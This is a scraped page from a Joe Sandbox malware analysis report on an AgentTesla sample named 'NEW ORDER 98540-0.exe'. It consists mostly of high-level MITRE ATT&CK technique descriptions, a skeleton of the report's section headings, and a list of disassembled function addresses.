Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NEW ORDER 98540-0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER 98540-0.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
NEW ORDER 98540-0.exe

Function 055CABA0 Relevance: 50.3, Strings: 37, Instructions: 4017
COMMON

Function 055CAB90 Relevance: 50.2, Strings: 37, Instructions: 3948
COMMON

Function 0137FCD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 055C45A5 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Function 055C45B0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 013758ED Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 055C2A64 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 013744F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 055C001A Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Function 055C0040 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 0137D4B0 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 0137DC40 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 030D3E80 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Function 030D4804 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre